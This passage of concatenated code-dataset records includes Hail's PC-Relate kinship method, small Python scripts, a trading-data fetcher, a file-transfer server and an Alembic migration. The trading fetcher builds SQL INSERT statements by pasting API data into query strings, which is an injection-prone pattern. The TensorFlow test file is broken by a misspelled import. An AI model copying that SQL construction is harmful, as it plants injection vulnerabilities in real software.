include_self_kinship=False) -> Table:\n r\"\"\"Compute relatedness estimates between individuals using a variant of the\n PC-Relate method.\n\n .. include:: ../_templates/req_diploid_gt.rst\n\n Examples\n --------\n Estimate kinship, identity-by-descent two, identity-by-descent one, and\n identity-by-descent zero for every pair of samples, using a minimum minor\n allele frequency filter of 0.01 and 10 principal components to control\n for population structure.\n\n >>> rel = hl.pc_relate(dataset.GT, 0.01, k=10)\n\n Only compute the kinship statistic. This is more efficient than\n computing all statistics.\n\n >>> rel = hl.pc_relate(dataset.GT, 0.01, k=10, statistics='kin')\n\n Compute all statistics, excluding sample-pairs with kinship less\n than 0.1. This is more efficient than producing the full table and\n then filtering using :meth:`.Table.filter`.\n\n >>> rel = hl.pc_relate(dataset.GT, 0.01, k=10, min_kinship=0.1)\n\n One can also pass in pre-computed principal component scores.\n To produce the same results as in the previous example:\n\n >>> _, scores_table, _ = hl.hwe_normalized_pca(dataset.GT,\n ... k=10,\n ... compute_loadings=False)\n >>> rel = hl.pc_relate(dataset.GT,\n ... 0.01,\n ... scores_expr=scores_table[dataset.col_key].scores,\n ... min_kinship=0.1)\n\n Notes\n -----\n The traditional estimator for kinship between a pair of individuals\n :math:`i` and :math:`j`, sharing the set :math:`S_{ij}` of\n single-nucleotide variants, from a population with allele frequencies\n :math:`p_s`, is given by:\n\n .. 
math::\n\n \\widehat{\\phi_{ij}} \\coloneqq\n \\frac{1}{|S_{ij}|}\n \\sum_{s \\in S_{ij}}\n \\frac{(g_{is} - 2 p_s) (g_{js} - 2 p_s)}\n {4 \\sum_{s \\in S_{ij}} p_s (1 - p_s)}\n\n This estimator is true under the model that the sharing of common\n (relative to the population) alleles is not very informative to\n relatedness (because they're common) and the sharing of rare alleles\n suggests a recent common ancestor from which the allele was inherited by\n descent.\n\n When multiple ancestry groups are mixed in a sample, this model breaks\n down. Alleles that are rare in all but one ancestry group are treated as\n very informative to relatedness. However, these alleles are simply\n markers of the ancestry group. The PC-Relate method corrects for this\n situation and the related situation of admixed individuals.\n\n PC-Relate slightly modifies the usual estimator for relatedness:\n occurrences of population allele frequency are replaced with an\n \"individual-specific allele frequency\". This modification allows the\n method to correctly weight an allele according to an individual's unique\n ancestry profile.\n\n The \"individual-specific allele frequency\" at a given genetic locus is\n modeled by PC-Relate as a linear function of a sample's first ``k``\n principal component coordinates. As such, the efficacy of this method\n rests on two assumptions:\n\n - an individual's first `k` principal component coordinates fully\n describe their allele-frequency-relevant ancestry, and\n\n - the relationship between ancestry (as described by principal\n component coordinates) and population allele frequency is linear\n\n The estimators for kinship, and identity-by-descent zero, one, and two\n follow. Let:\n\n - :math:`S_{ij}` be the set of genetic loci at which both individuals\n :math:`i` and :math:`j` have a defined genotype\n\n - :math:`g_{is} \\in {0, 1, 2}` be the number of alternate alleles that\n individual :math:`i` has at genetic locus :math:`s`\n\n - :math:`\\widehat{\\mu_{is}} \\in [0, 1]` be the individual-specific allele\n frequency for individual :math:`i` at genetic locus :math:`s`\n\n - :math:`{\\widehat{\\sigma^2_{is}}} \\coloneqq \\widehat{\\mu_{is}} (1 - \\widehat{\\mu_{is}})`,\n the binomial variance of :math:`\\widehat{\\mu_{is}}`\n\n - :math:`\\widehat{\\sigma_{is}} \\coloneqq \\sqrt{\\widehat{\\sigma^2_{is}}}`,\n the binomial standard deviation of :math:`\\widehat{\\mu_{is}}`\n\n - :math:`\\text{IBS}^{(0)}_{ij} \\coloneqq \\sum_{s \\in S_{ij}} \\mathbb{1}_{||g_{is} - g_{js} = 2||}`,\n the number of genetic loci at which individuals :math:`i` and :math:`j`\n share no alleles\n\n - :math:`\\widehat{f_i} \\coloneqq 2 \\widehat{\\phi_{ii}} - 1`, the inbreeding\n coefficient for individual :math:`i`\n\n - :math:`g^D_{is}` be a dominance encoding of the genotype matrix, and\n :math:`X_{is}` be a normalized dominance-coded genotype matrix\n\n .. math::\n\n g^D_{is} \\coloneqq\n \\begin{cases}\n \\widehat{\\mu_{is}} & g_{is} = 0 \\\\\n 0 & g_{is} = 1 \\\\\n 1 - \\widehat{\\mu_{is}} & g_{is} = 2\n \\end{cases}\n\n \\qquad\n X_{is} \\coloneqq g^D_{is} - \\widehat{\\sigma^2_{is}} (1 - \\widehat{f_i})\n\n The estimator for kinship is given by:\n\n .. math::\n\n \\widehat{\\phi_{ij}} \\coloneqq\n \\frac{\\sum_{s \\in S_{ij}}(g - 2 \\mu)_{is} (g - 2 \\mu)_{js}}\n {4 * \\sum_{s \\in S_{ij}}\n \\widehat{\\sigma_{is}} \\widehat{\\sigma_{js}}}\n\n The estimator for identity-by-descent two is given by:\n\n .. 
math::\n\n        \\widehat{k^{(2)}_{ij}} \\coloneqq\n        \\frac{\\sum_{s \\in S_{ij}}X_{is} X_{js}}{\\sum_{s \\in S_{ij}}\n        \\widehat{\\sigma^2_{is}} \\widehat{\\sigma^2_{js}}}\n\n    The estimator for identity-by-descent zero is given by:\n\n    .. math::\n\n        \\widehat{k^{(0)}_{ij}} \\coloneqq\n        \\begin{cases}\n          \\frac{\\text{IBS}^{(0)}_{ij}}\n                {\\sum_{s \\in S_{ij}}\n                      \\widehat{\\mu_{is}}^2(1 - \\widehat{\\mu_{js}})^2\n                    + (1 - \\widehat{\\mu_{is}})^2\\widehat{\\mu_{js}}^2}\n            & \\widehat{\\phi_{ij}} > 2^{-5/2} \\\\\n          1 - 4 \\widehat{\\phi_{ij}} + k^{(2)}_{ij}\n            & \\widehat{\\phi_{ij}} \\le 2^{-5/2}\n        \\end{cases}\n\n    The estimator for identity-by-descent one is given by:\n\n    .. math::\n\n        \\widehat{k^{(1)}_{ij}} \\coloneqq\n        1 - \\widehat{k^{(2)}_{ij}} - \\widehat{k^{(0)}_{ij}}\n\n    Note that, even if present, phase information is ignored by this method.\n\n    The PC-Relate method is described in \"Model-free Estimation of Recent\n    Genetic Relatedness\". Conomos MP, Reiner AP, Weir BS, Thornton TA. in\n    American Journal of Human Genetics. 2016 Jan 7. The reference\n    implementation is available in the `GENESIS Bioconductor package\n    `_ .\n\n    :func:`.pc_relate` differs from the reference implementation in a few\n    ways:\n\n    - if `k` is supplied, sample scores are computed via PCA on all samples,\n      not a specified subset of genetically unrelated samples. The latter\n      can be achieved by filtering samples, computing PCA variant loadings,\n      and using these loadings to compute and pass in scores for all samples.\n\n    - the estimators do not perform small sample correction\n\n    - the algorithm does not provide an option to use population-wide\n      allele frequency estimates\n\n    - the algorithm does not provide an option to not use \"overall\n      standardization\" (see R ``pcrelate`` documentation)\n\n    Under the PC-Relate model, kinship, :math:`\\phi_{ij}`, ranges from 0 to\n    0.5, and is precisely half of the\n    fraction-of-genetic-material-shared. Listed below are the statistics for\n    a few pairings:\n\n    - Monozygotic twins share all their genetic material so their kinship\n      statistic is 0.5 in expectation.\n\n    - Parent-child and sibling pairs both have kinship 0.25 in expectation\n      and are separated by the identity-by-descent-zero, :math:`k^{(0)}_{ij}`,\n      statistic which is zero for parent-child pairs and 0.25 for sibling\n      pairs.\n\n    - Avuncular pairs and grand-parent/-child pairs both have kinship 0.125\n      in expectation and both have identity-by-descent-zero 0.5 in expectation.\n\n    - \"Third degree relatives\" are those pairs sharing\n      :math:`2^{-3} = 12.5 %` of their genetic material; the results of\n      PC-Relate are often too noisy to reliably distinguish these pairs from\n      higher-degree-relative-pairs or unrelated pairs.\n\n    Note that :math:`g_{is}` is the number of alternate alleles. Hence, for\n    multi-allelic variants, a value of 2 may indicate two distinct alternative\n    alleles rather than a homozygous variant genotype. To enforce the latter,\n    either filter or split multi-allelic variants first.\n\n    The resulting table has the first 3, 4, 5, or 6 fields below, depending on\n    the `statistics` parameter:\n\n    - `i` (``col_key.dtype``) -- First sample. (key field)\n    - `j` (``col_key.dtype``) -- Second sample. 
(key field)\n - `kin` (:py:data:`.tfloat64`) -- Kinship estimate, :math:`\\widehat{\\phi_{ij}}`.\n - `ibd2` (:py:data:`.tfloat64`) -- IBD2 estimate, :math:`\\widehat{k^{(2)}_{ij}}`.\n - `ibd0` (:py:data:`.tfloat64`) -- IBD0 estimate, :math:`\\widehat{k^{(0)}_{ij}}`.\n - `ibd1` (:py:data:`.tfloat64`) -- IBD1 estimate, :math:`\\widehat{k^{(1)}_{ij}}`.\n\n Here ``col_key`` refers to the column key of the source matrix table,\n and ``col_key.dtype`` is a struct containing the column key fields.\n\n There is one row for each pair of distinct samples (columns), where `i`\n corresponds to the column of smaller column index. In particular, if the\n same column key value exists for :math:`n` columns, then the resulting\n table will have :math:`\\binom{n-1}{2}` rows with both key fields equal to\n that column key value. This may result in unexpected behavior in downstream\n processing.\n\n Parameters\n ----------\n call_expr : :class:`.CallExpression`\n Entry-indexed call expression.\n min_individual_maf : :obj:`float`\n The minimum individual-specific minor allele frequency.\n If either individual-specific minor allele frequency for a pair of\n individuals is below this threshold, then the variant will not\n be used to estimate relatedness for the pair.\n k : :obj:`int`, optional\n If set, `k` principal component scores are computed and used.\n Exactly one of `k` and `scores_expr` must be specified.\n scores_expr : :class:`.ArrayNumericExpression`, optional\n Column-indexed expression of principal component scores, with the same\n source as `call_expr`. All array values must have the same positive length,\n corresponding to the number of principal components, and all scores must\n be non-missing. Exactly one of `k` and `scores_expr` must be specified.\n min_kinship : :obj:`float`, optional\n If set, pairs of samples with kinship lower than `min_kinship` are excluded\n from the results.\n statistics : :class:`str`\n Set of statistics to compute.\n If ``'kin'``, only estimate the kinship statistic.\n If ``'kin2'``, estimate the above and IBD2.\n If ``'kin20'``, estimate the above and IBD0.\n If ``'all'``, estimate the above and IBD1.\n block_size : :obj:`int`, optional\n Block size of block matrices used in the algorithm.\n Default given by :meth:`.BlockMatrix.default_block_size`.\n include_self_kinship: :obj:`bool`\n If ``True``, include entries for an individual's estimated kinship with\n themselves. 
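By the definition of :math:`\\widehat{f_i}` above, these diagonal entries\n        satisfy :math:`\\widehat{\\phi_{ii}} = (1 + \\widehat{f_i})/2`. 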
Defaults to ``False``.\n\n Returns\n -------\n :class:`.Table`\n A :class:`.Table` mapping pairs of samples to their pair-wise statistics.\n \"\"\"\n mt = matrix_table_source('pc_relate/call_expr', call_expr)\n\n if k and scores_expr is None:\n _, scores, _ = hwe_normalized_pca(call_expr, k, compute_loadings=False)\n scores_expr = scores[mt.col_key].scores\n elif not k and scores_expr is not None:\n analyze('pc_relate/scores_expr', scores_expr, mt._col_indices)\n elif k and scores_expr is not None:\n raise ValueError(\"pc_relate: exactly one of 'k' and 'scores_expr' must be set, found both\")\n else:\n raise ValueError(\"pc_relate: exactly one of 'k' and 'scores_expr' must be set, found neither\")\n\n scores_table = mt.select_cols(__scores=scores_expr)\\\n .key_cols_by().select_cols('__scores').cols()\n\n n_missing = scores_table.aggregate(agg.count_where(hl.is_missing(scores_table.__scores)))\n if n_missing > 0:\n raise ValueError(f'Found {n_missing} columns with missing scores array.')\n\n mt = mt.select_entries(__gt=call_expr.n_alt_alleles()).unfilter_entries()\n mt = mt.annotate_rows(__mean_gt=agg.mean(mt.__gt))\n mean_imputed_gt = hl.or_else(hl.float64(mt.__gt), mt.__mean_gt)\n\n if not block_size:\n block_size = BlockMatrix.default_block_size()\n\n g = BlockMatrix.from_entry_expr(mean_imputed_gt,\n block_size=block_size)\n\n pcs = scores_table.collect(_localize=False).map(lambda x: x.__scores)\n\n ht = Table(ir.BlockMatrixToTableApply(g._bmir, pcs._ir, {\n 'name': 'PCRelate',\n 'maf': min_individual_maf,\n 'blockSize': block_size,\n 'minKinship': min_kinship,\n 'statistics': {'kin': 0, 'kin2': 1, 'kin20': 2, 'all': 3}[statistics]\n }))\n\n if statistics == 'kin':\n ht = ht.drop('ibd0', 'ibd1', 'ibd2')\n elif statistics == 'kin2':\n ht = ht.drop('ibd0', 'ibd1')\n elif statistics == 'kin20':\n ht = ht.drop('ibd1')\n\n if not include_self_kinship:\n ht = ht.filter(ht.i == ht.j, keep=False)\n\n col_keys = hl.literal(mt.select_cols().key_cols_by().cols().collect(), dtype=tarray(mt.col_key.dtype))\n return ht.key_by(i=col_keys[ht.i], j=col_keys[ht.j])\n","sub_path":"hail/python/hail/methods/relatedness/pc_relate.py","file_name":"pc_relate.py","file_ext":"py","file_size_in_byte":14678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"423095302","text":"vetor = list(range(1, 7))\n\n# a\nvetor.extend([1, 0, 5, -2, -5, 7])\n\n# b\nsoma = vetor[0] + vetor[1] + vetor[5]\nprint(f'soma: {soma}')\n\n# c\nvetor[3] = 100\n\n# d\nfor i in vetor:\n print(i)\n","sub_path":"programação em python do básico ao avançado/exercicios/s07_p1_ex01.py","file_name":"s07_p1_ex01.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"168690512","text":"\"\"\"\nsoc.py\n\nAuthor: Tobias Seydewitz\nDate: 25.09.18\nMail: tobi.seyde@gmail.com\n\"\"\"\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nsrc = pd.read_csv('/home/tobi/Documents/Master/code/python/Master/data/proc/ana/soce.csv')\nsrc.drop(['sc4_me', 'sc4_ma', 'sc4_mi', 'sc2_me', 'sc2_ma', 'sc2_mi'], axis=1, inplace=True)\nsrc = src[['Unnamed: 0', 'sc3_ma', 'sc3_me', 'sc3_mi', 'sc1_ma', 'sc1_me', 'sc1_mi']]\nsrc = src.values\n\nfig, axes = plt.subplots(ncols=3, sharey=True, figsize=(4, 2.5))\nfig.subplots_adjust(wspace=0.1)\n\nfor ax, row in zip(axes, [src[1], src[2], src[0]]):\n mean = row[2::3]/1000000000\n lower_err = mean - row[3::3]/1000000000\n upper_err = row[1::3]/1000000000 - mean\n\n ax.bar(\n 
range(1, 3),\n mean,\n yerr=[lower_err, upper_err],\n width=0.6,\n align='center',\n color='#fc8d59',\n capsize=4\n )\n\n\n ax.set_xticklabels(\n ['SC1', 'SC2'],\n minor=False,\n fontsize=10,\n fontname='Times new roman',\n )\n ax.set_title(row[0].capitalize(), fontsize=12, fontname='Times new roman')\n\naxes[0].set_ylabel(r'SOCe [Gt CO$_2$]', fontsize=12, fontname='Times new roman')\n\nplt.show()\nfig.savefig(\n '/home/tobi/Documents/Master/code/python/Master/doc/thesis/img/soc.png',\n format='png'\n)\nfor row in src:\n print(' & '.join(map(lambda x: x if isinstance(x, str) else str(round(x/1000000000, 2)), row)))","sub_path":"tropicly/scripts/soc.py","file_name":"soc.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542788009","text":"import asyncio\nimport time\nfrom decimal import Decimal\nfrom typing import List\n\nfrom aiohttp import ClientSession\nfrom requests import HTTPError\nimport iso8601\nfrom utils.postgresql import connect, config\nfrom price.data_fetcher import get_historic_price\n\nSQL_CREATE_TABLE = '''CREATE TABLE IF NOT EXISTS public.trades\n(\n id bigint NOT NULL,\n \"time\" timestamp with time zone NOT NULL,\n taker character(43) NOT NULL,\n maker character(43) NOT NULL,\n buy boolean NOT NULL,\n taker_fee numeric NOT NULL,\n maker_fee numeric NOT NULL,\n market character(15) NOT NULL,\n price numeric NOT NULL,\n quantity numeric NOT NULL,\n height integer NOT NULL,\n volume numeric,\n taker_fee_usd numeric,\n maker_fee_usd numeric,\n CONSTRAINT trades_pkey PRIMARY KEY (id)\n)'''\n\nHOST = \"http://164.132.169.19:5001\"\n\nMARKETS = {}\n\nasync def get_markets():\n async with ClientSession() as session:\n url = f\"{HOST}/get_markets\"\n result = await session.request(method='GET', url=url)\n data = await result.json()\n print(data)\n return data\n\n\nasync def update_markets():\n global MARKETS\n data = await get_markets()\n markets = {}\n for market in data:\n ticker = market[\"name\"]\n markets[ticker] = market\n MARKETS = markets\n\n\ndef create_tables(db_config):\n global SQL_CREATE_TABLE\n with connect(db_config) as connection:\n cur = connection.cursor()\n\n cur.execute(SQL_CREATE_TABLE)\n\n connection.commit()\n\n cur.close()\n\n\ndef get_max_trade_id_and_count(db_config):\n with connect(db_config) as connection:\n cur = connection.cursor()\n\n cur.execute(\"SELECT MAX(id), COUNT(1) FROM public.trades;\")\n\n result = cur.fetchone()\n\n cur.close()\n\n if result[0] and result[1]:\n return result[0], result[1]\n return 0, 0\n\n\ndef calculate_volume_and_fees(db_config, trade: dict):\n global MARKETS\n ticker: str = trade[\"market\"]\n if ticker not in MARKETS:\n raise RuntimeError(f\"No market found for {ticker}\")\n\n market = MARKETS[ticker]\n\n timestamp = trade[\"block_created_at\"]\n\n taker_fee_denom = trade[\"taker_fee_denom\"]\n taker_fee_amount = trade[\"taker_fee_amount\"]\n taker_fee_usd = \"0\"\n taker_price = None\n if taker_fee_amount != \"0\":\n utc_time, taker_price = get_historic_price(db_config, taker_fee_denom, timestamp)\n if taker_price:\n taker_fee_usd = f\"{Decimal(taker_fee_amount) * taker_price:.4f}\"\n\n maker_fee_denom = trade[\"maker_fee_denom\"]\n maker_fee_amount = trade[\"maker_fee_amount\"]\n maker_fee_usd = \"0\"\n if maker_fee_amount != \"0\":\n if maker_fee_amount == taker_fee_amount:\n maker_fee_usd = taker_fee_usd\n else:\n if taker_fee_denom == maker_fee_denom and taker_price:\n maker_price = taker_price\n else:\n utc_time, 
maker_price = get_historic_price(db_config, maker_fee_denom, timestamp)\n\n            if maker_price:\n                maker_fee_usd = f\"{Decimal(maker_fee_amount) * maker_price:.4f}\"\n\n    qty_denom = market[\"base\"]\n    volume = \"0\"\n    quantity = trade[\"quantity\"]\n    utc_time, qty_price = get_historic_price(db_config, qty_denom, timestamp)\n    if qty_price:\n        volume = f\"{Decimal(quantity) * qty_price:.4f}\"\n\n    return volume, taker_fee_usd, maker_fee_usd\n\n\ndef insert_trades(db_config: dict, trades: List[dict], highest_db_id: int):\n    sql_trades = []\n    for trade in trades:\n        trade_id: int = int(trade[\"id\"])\n        if trade_id <= highest_db_id:\n            continue\n\n        volume, taker_fee, maker_fee = calculate_volume_and_fees(db_config, trade)\n\n        timestamp = trade[\"block_created_at\"]\n\n        sql_trades.append(\n            (\n                trade[\"id\"],\n                f\"timestamp '{timestamp}'\",\n                f\"'{trade['taker_address']}'\",\n                f\"'{trade['maker_address']}'\",\n                \"true\" if trade[\"taker_side\"] == \"buy\" else \"false\",\n                trade[\"taker_fee_amount\"],\n                trade[\"maker_fee_amount\"],\n                f\"'{trade['market']}'\",\n                trade[\"price\"],\n                trade[\"quantity\"],\n                trade[\"block_height\"],\n                volume,\n                taker_fee,\n                maker_fee\n            )\n        )\n\n    if not sql_trades:\n        return\n\n    with connect(db_config) as connection:\n\n        cur = connection.cursor()\n\n        insert_str = \",\".join([f\"({','.join(sql_trade)})\" for sql_trade in sql_trades])\n        cur.execute(f\"INSERT INTO public.trades(id, time, taker, maker, buy, taker_fee, maker_fee, market, price, quantity, height, volume, taker_fee_usd, maker_fee_usd) VALUES {insert_str}\")\n\n        connection.commit()\n\n        cur.close()\n\n\nasync def get_trades(after_id, before_id, session):\n    \"\"\"Fetch one page of trades from the exchange API (asynchronously).\"\"\"\n    url = f\"{HOST}/get_trades\"\n    try:\n        response = await session.request(method='GET', url=url, params={\"before_id\": before_id, \"after_id\": after_id})\n        response.raise_for_status()\n        print(f\"Response status ({url} {after_id}-{before_id}): {response.status}\")\n    except HTTPError as http_err:\n        print(f\"HTTP error occurred: {http_err}\")\n        raise\n    except Exception as err:\n        print(f\"An error occurred: {err}\")\n        raise\n    response_json = await response.json()\n    return response_json\n\n\nasync def fast_data_fetch(start_id, result, session):\n    \"\"\"Wrapper for running one fetch in an asynchronous manner\"\"\"\n    try:\n        response = await get_trades(start_id, start_id+201, session)\n        result += response\n    except Exception as err:\n        print(f\"Exception occurred: {err}\")\n\n\nasync def main():\n    db_config = config(\"trading/database.ini\")\n    create_tables(db_config)\n    max_parallel_requests = 100\n    parallel_requests = 1\n    await update_markets()\n    while True:\n        highest_db_id, count = get_max_trade_id_and_count(db_config)\n        print(f\"[{count}]Highest Trade ID in database: {highest_db_id}\")\n        result = []\n        start_time = time.time()\n        print(f\"Start requesting with {parallel_requests} parallel requests\")\n        async with ClientSession() as session:\n            await asyncio.gather(*[fast_data_fetch(highest_db_id+i*200, result, session) for i in range(parallel_requests)])\n        duration = time.time() - start_time\n        print(f\"Fetching took {duration:.3}s\")\n        start_time = time.time()\n        insert_trades(db_config, result, highest_db_id)\n        duration = time.time() - start_time\n        print(f\"Inserting took {duration:.3}s\")\n        parallel_requests = min(int((len(result) / 200) * 2)+1, max_parallel_requests)\n        if len(result) < 200:\n            time.sleep(2)\n\n\nif __name__ == '__main__':\n    loop = asyncio.get_event_loop()\n    
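# Poll indefinitely; main() loops forever and only exits on an unhandled error.\n    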
loop.run_until_complete(main())\n","sub_path":"trading/data_fetcher.py","file_name":"data_fetcher.py","file_ext":"py","file_size_in_byte":6881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"286475233","text":"import tesnorflow as tf\nimport numpy as np\nimport localization_op\nimport localization_op_grad\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\narray = np.random.rand(32, 100, 100, 3)\ndata = tf.convert_to_tensor(array, dtype=tf.float32)\nrois = tf.convert_to_tensor([[0, 10, 10, 20, 20], [32, 30, 30, 40, 40]], dtype=tf.float32)\n\nW = weight_variable([3, 3, 3, 1])\nh = conv2d(data, W)\n\n[y, argmax] = localization_op.localize(h, rois)\ny_data = tf.convert_to_tensor\n","sub_path":"fast-rcnn/lib/localization_layer/localization_op_test.py","file_name":"localization_op_test.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"234100612","text":"# f1/s/device/honeywellreader.py\n\nfrom f1.s.core.docker import DockerRunner\nfrom f1.s.device.base_device import Device\n\n\nclass Reader(Device):\n def __init__(self, id, type, direction, docker, data_pin, clock_pin, architecture, session):\n super().__init__(type, id, docker, architecture, session)\n\n self.direction = direction\n self.data_pin = data_pin\n self.clock_pin = clock_pin\n self.arg = (id, direction)\n\n def scan(self):\n docker = DockerRunner(self.docker, self.session)\n run = docker.run(self.docker_image,\n self.type,\n None,\n None,\n None,\n str(self.direction),\n self.id,\n self.data_pin,\n self.clock_pin)\n return run\n","sub_path":"f1/s/device/honeywellrfidreader.py","file_name":"honeywellrfidreader.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"339420204","text":"import socket\nimport os\nimport logging\nfrom datetime import datetime\nimport threading\nimport time\n\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# IP del servidor\nip='0.0.0.0'\n#Puerto para el socket TCP\npuertoTCP=10000\nserver_address = (ip, puertoTCP)\npuerto=65535\n\nsock.bind(server_address)\nprint('starting up on {} port {}'.format(*sock.getsockname()))\nsock.listen(25)\n\n# Separador\nSEPARATOR = \"SEPARATOR\"\n\n#Archivos a enviar\nfile1 = \"Archivos/temp_100MB_file.txt\"\nfile2 = \"Archivos/temp_250MB_file.txt\"\n\n#Nombre archivos a enviar\nfilename1 = \"temp_100MB_file.txt\"\nfilename2 = \"temp_250MB_file.txt\"\n\n#Tamaño de los archivos\nfilesize1 = os.path.getsize(file1)\nfilesize2 = os.path.getsize(file2)\n\n#Array vacio de conecciones\nconexiones = []\n\n#Array vacio de las ips de las conexiones\naddresses = []\n\n#Array vacio con tiempos de entrega del archivo\ntiempos = []\n\n#Array vacio con variable que indica si la transmisión fue exitosa o no\nexitos = []\n\n#Array vacio con el número de paquetes enviados\npaquetes = []\n\n#Array vacio con el número de bytes enviados\nbytes = []\n\n#Nombre log\nLOG_FILENAME = datetime.now().strftime('./LogsServidor/%Y_%m_%d_%H_%M_%S.log')\n\n#Variable para cerrar servidor\nfin = False\n\n#Tamaño del buffer\nBUFFER_SIZE = 1024\n\n#Función envío de archivos\ndef archivo(num_archivo, c, i, client_address):\n nombreArchivo = ''\n tamArchivo = 0\n arch = ''\n 
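# One UDP socket per client thread; data chunks are streamed to port (puerto - i) for client i.\n    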
udpsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    if (num_archivo == 1):\n        nombreArchivo = filename1\n        tamArchivo = filesize1\n        arch = file1\n    elif (num_archivo == 2):\n        nombreArchivo = filename2\n        tamArchivo = filesize2\n        arch = file2\n    start_time = datetime.now()\n    paqs = 0\n    bytes_env = 0\n    nombreTamano = f\"{nombreArchivo}{SEPARATOR}{tamArchivo}\"\n    c.send(nombreTamano.encode('ISO-8859-1'))\n    time.sleep(1)\n    with open(arch, \"rb\") as f:\n        while True:\n            bytes_read = f.read(BUFFER_SIZE)\n            if not bytes_read:\n                end_time = datetime.now()\n                tiempo = end_time - start_time\n                tiempos.append(tiempo)\n                paquetes.append(paqs)\n                bytes_sent.append(bytes_env)\n                break\n            udpsock.sendto(bytes_read, (client_address, puerto-i))\n            paqs += 1\n            bytes_env += BUFFER_SIZE\n            c.send(b'Enviando')\n    message = b'Finaliza transmision'\n    c.send(message)\n    data = c.recv(BUFFER_SIZE)\n    mensaje2 = data.decode('utf-8')\n    exito = 0\n    if ('Transmision exitosa' in mensaje2):\n        exito = 1\n    elif ('Transmision fallida' in mensaje2):\n        exito = 0\n    exitos.append(exito)\n\n# Function to build the log\ndef log(filenameF, filesize, exitos, tiempos, paquetes, bytes_sent):\n    filename = LOG_FILENAME\n    logging.basicConfig(filename = filename, encoding='utf-8', level=logging.INFO)\n    logging.info('SERVER LOG')\n    logging.info('File name:' + filenameF)\n    logging.info('File size:' + str(filesize))\n    i = 1\n    for c in conexiones:\n        logging.info('Client ' + str(i))\n        if (exitos[i-1] == 1):\n            logging.info('File was delivered successfully')\n        else:\n            logging.info('File was not delivered successfully')\n        logging.info('File transfer time for client ' + str(i) + ': ' + str(tiempos[i-1]))\n        logging.info('Total packets transmitted to client ' + str(i) + ': ' + str(paquetes[i-1]))\n        logging.info('Total bytes transmitted to client ' + str(i) + ': ' + str(bytes_sent[i-1]))\n        i += 1\n    return filename\n\nif __name__ == \"__main__\":\n    while True:\n        threads = []\n        print('waiting for a connection')\n        num_archivo = int(input('Which file do you want to send? 
(1: 100MB, 2: 250MB)'))\n        num_clientes = int(input('How many clients should the file be sent to?'))\n        nomArchivo = ''\n        tamArchivo = 0\n        if (num_archivo == 1):\n            nomArchivo = filename1\n            tamArchivo = filesize1\n        elif (num_archivo == 2):\n            nomArchivo = filename2\n            tamArchivo = filesize2\n\n        try:\n            while True:\n                connection, (client_address, client_ip) = sock.accept()\n                data = connection.recv(BUFFER_SIZE)\n                print('received {!r}'.format(data))\n                mensaje = data.decode('utf-8')\n                if mensaje == ('Listo para recibir'):\n                    conexiones.append(connection)\n                    addresses.append(client_address)\n                if len(conexiones) >= num_clientes:\n                    i=1\n                    for c in conexiones:\n                        x = threading.Thread(target=archivo, args=(num_archivo, c, i, addresses[i-1]))\n                        x.start()\n                        time.sleep(1)\n                        threads.append(x)\n                        i += 1\n                    for x in threads:\n                        x.join()\n                    fin = True\n                    break\n        finally:\n            filename = log(nomArchivo, tamArchivo, exitos, tiempos, paquetes, bytes_sent)\n            connection.close()\n            if fin:\n                break","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319486873","text":"\"\"\"empty message\n\nRevision ID: eb1e026f5376\nRevises: \nCreate Date: 2018-05-14 11:34:21.792959\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'eb1e026f5376'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('categories',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('utc_created', sa.DateTime(), nullable=True),\n    sa.Column('utc_updated', sa.DateTime(), nullable=True),\n    sa.Column('name', sa.String(length=20), nullable=False),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_index(op.f('ix_categories_name'), 'categories', ['name'], unique=True)\n    op.create_table('roles',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('utc_created', sa.DateTime(), nullable=True),\n    sa.Column('utc_updated', sa.DateTime(), nullable=True),\n    sa.Column('name', sa.String(length=20), nullable=False),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('name')\n    )\n    op.create_table('tags',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('utc_created', sa.DateTime(), nullable=True),\n    sa.Column('utc_updated', sa.DateTime(), nullable=True),\n    sa.Column('name', sa.String(length=20), nullable=False),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_index(op.f('ix_tags_name'), 'tags', ['name'], unique=True)\n    op.create_table('users',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('utc_created', sa.DateTime(), nullable=True),\n    sa.Column('utc_updated', sa.DateTime(), nullable=True),\n    sa.Column('username', sa.String(length=32), nullable=False),\n    sa.Column('email', sa.String(length=32), nullable=False),\n    sa.Column('password_hash', sa.Binary(), nullable=False),\n    sa.Column('is_enable', sa.Boolean(), nullable=True),\n    sa.Column('role_id', sa.Integer(), nullable=True),\n    sa.ForeignKeyConstraint(['role_id'], ['roles.id'], ),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('email'),\n    sa.UniqueConstraint('username')\n    )\n    op.create_table('articles',\n    